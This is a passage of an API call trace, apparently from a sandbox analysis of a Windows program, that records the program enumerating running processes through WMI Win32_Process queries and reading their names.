pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1296\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.516] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1296\"") returned 0x5e [0264.516] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1296\"") returned 0x5e [0264.516] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.516] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.516] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.516] IUnknown:Release (This=0x601a94) returned 0x1 [0264.517] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba398) returned 0x0 [0264.517] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba398, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.517] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba398, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5515228) returned 0x0 [0264.517] WbemDefPath:IUnknown:Release (This=0x54ba398) returned 0x0 [0264.517] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515228, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5515228) returned 0x0 [0264.518] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515228, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.518] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515228, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.518] WbemDefPath:IUnknown:AddRef (This=0x5515228) returned 0x3 [0264.518] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515228, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.518] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515228, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.518] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515228, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x550e830) returned 0x0 [0264.518] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x550e830, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.518] WbemDefPath:IUnknown:Release (This=0x550e830) returned 0x3 [0264.518] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.518] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.518] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515228, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.518] WbemDefPath:IUnknown:Release (This=0x5515228) returned 0x2 [0264.518] WbemDefPath:IUnknown:Release (This=0x5515228) returned 0x1 [0264.518] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.518] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.518] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515228, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5515228) returned 0x0 [0264.519] WbemDefPath:IUnknown:AddRef (This=0x5515228) returned 0x3 [0264.519] WbemDefPath:IUnknown:Release (This=0x5515228) returned 0x2 [0264.519] WbemDefPath:IWbemPath:SetText (This=0x5515228, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1296\"") returned 0x0 [0264.519] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.519] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.519] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.519] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.519] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.519] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.519] IWbemClassObject:Get (in: This=0x671fe8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23cb268*=0, plFlavor=0x23cb26c*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cellresource.exe", varVal2=0x0), pType=0x23cb268*=8, plFlavor=0x23cb26c*=0) returned 0x0 [0264.519] SysStringByteLen (bstr="cellresource.exe") returned 0x20 [0264.519] SysStringByteLen (bstr="cellresource.exe") returned 0x20 [0264.519] IWbemClassObject:Get (in: This=0x671fe8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23cb268*=8, plFlavor=0x23cb26c*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="cellresource.exe", varVal2=0x0), pType=0x23cb268*=8, plFlavor=0x23cb26c*=0) returned 0x0 [0264.519] SysStringByteLen (bstr="cellresource.exe") returned 0x20 [0264.519] SysStringByteLen (bstr="cellresource.exe") returned 0x20 [0264.519] CoTaskMemAlloc (cb=0x4) returned 0x54ba238 [0264.519] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba238, puReturned=0x23c1fd0 | out: apObjects=0x54ba238*=0x671b20, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.521] IUnknown:QueryInterface (in: This=0x671b20, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x671b20) returned 0x0 [0264.521] IUnknown:QueryInterface (in: This=0x671b20, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.521] IUnknown:QueryInterface (in: This=0x671b20, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.521] IUnknown:QueryInterface (in: This=0x671b20, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.521] IUnknown:AddRef (This=0x671b20) returned 0x3 [0264.521] IUnknown:QueryInterface (in: This=0x671b20, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.521] IUnknown:QueryInterface (in: This=0x671b20, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.521] IUnknown:QueryInterface (in: This=0x671b20, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x671b24) returned 0x0 [0264.522] IMarshal:GetUnmarshalClass (in: This=0x671b24, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.522] IUnknown:Release (This=0x671b24) returned 0x3 [0264.522] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.522] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.522] IUnknown:QueryInterface (in: This=0x671b20, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.522] IUnknown:Release (This=0x671b20) returned 0x2 [0264.522] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.522] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.522] IUnknown:QueryInterface (in: This=0x671b20, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x671b20) returned 0x0 [0264.522] IUnknown:AddRef (This=0x671b20) returned 0x4 [0264.522] IUnknown:Release (This=0x671b20) returned 0x3 [0264.522] IUnknown:Release (This=0x671b20) returned 0x2 [0264.522] CoTaskMemFree (pv=0x54ba238) [0264.522] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.522] IUnknown:AddRef (This=0x671b20) returned 0x3 [0264.522] IWbemClassObject:Get (in: This=0x671b20, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.523] IWbemClassObject:Get (in: This=0x671b20, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1876\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.523] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1876\"") returned 0x5e [0264.523] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1876\"") returned 0x5e [0264.523] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.523] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.523] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.523] IUnknown:Release (This=0x601a94) returned 0x1 [0264.524] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba388) returned 0x0 [0264.524] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba388, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.524] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba388, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514f88) returned 0x0 [0264.524] WbemDefPath:IUnknown:Release (This=0x54ba388) returned 0x0 [0264.524] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f88, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514f88) returned 0x0 [0264.524] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f88, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.524] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f88, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.525] WbemDefPath:IUnknown:AddRef (This=0x5514f88) returned 0x3 [0264.525] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f88, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.525] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f88, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.525] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f88, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x550ea58) returned 0x0 [0264.525] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x550ea58, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.525] WbemDefPath:IUnknown:Release (This=0x550ea58) returned 0x3 [0264.525] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.525] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.525] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f88, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.525] WbemDefPath:IUnknown:Release (This=0x5514f88) returned 0x2 [0264.525] WbemDefPath:IUnknown:Release (This=0x5514f88) returned 0x1 [0264.525] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.525] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.525] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f88, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514f88) returned 0x0 [0264.525] WbemDefPath:IUnknown:AddRef (This=0x5514f88) returned 0x3 [0264.526] WbemDefPath:IUnknown:Release (This=0x5514f88) returned 0x2 [0264.526] WbemDefPath:IWbemPath:SetText (This=0x5514f88, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1876\"") returned 0x0 [0264.526] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.526] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.526] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.526] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.526] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.526] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.526] IWbemClassObject:Get (in: This=0x671b20, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23cbb0c*=0, plFlavor=0x23cbb10*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="firm_against_member.exe", varVal2=0x0), pType=0x23cbb0c*=8, plFlavor=0x23cbb10*=0) returned 0x0 [0264.526] SysStringByteLen (bstr="firm_against_member.exe") returned 0x2e [0264.526] SysStringByteLen (bstr="firm_against_member.exe") returned 0x2e [0264.526] IWbemClassObject:Get (in: This=0x671b20, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23cbb0c*=8, plFlavor=0x23cbb10*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="firm_against_member.exe", varVal2=0x0), pType=0x23cbb0c*=8, plFlavor=0x23cbb10*=0) returned 0x0 [0264.526] SysStringByteLen (bstr="firm_against_member.exe") returned 0x2e [0264.526] SysStringByteLen (bstr="firm_against_member.exe") returned 0x2e [0264.526] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0264.526] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x671cb8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.527] IUnknown:QueryInterface (in: This=0x671cb8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x671cb8) returned 0x0 [0264.527] IUnknown:QueryInterface (in: This=0x671cb8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.527] IUnknown:QueryInterface (in: This=0x671cb8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.527] IUnknown:QueryInterface (in: This=0x671cb8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.528] IUnknown:AddRef (This=0x671cb8) returned 0x3 [0264.528] IUnknown:QueryInterface (in: This=0x671cb8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.528] IUnknown:QueryInterface (in: This=0x671cb8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.528] IUnknown:QueryInterface (in: This=0x671cb8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x671cbc) returned 0x0 [0264.528] IMarshal:GetUnmarshalClass (in: This=0x671cbc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 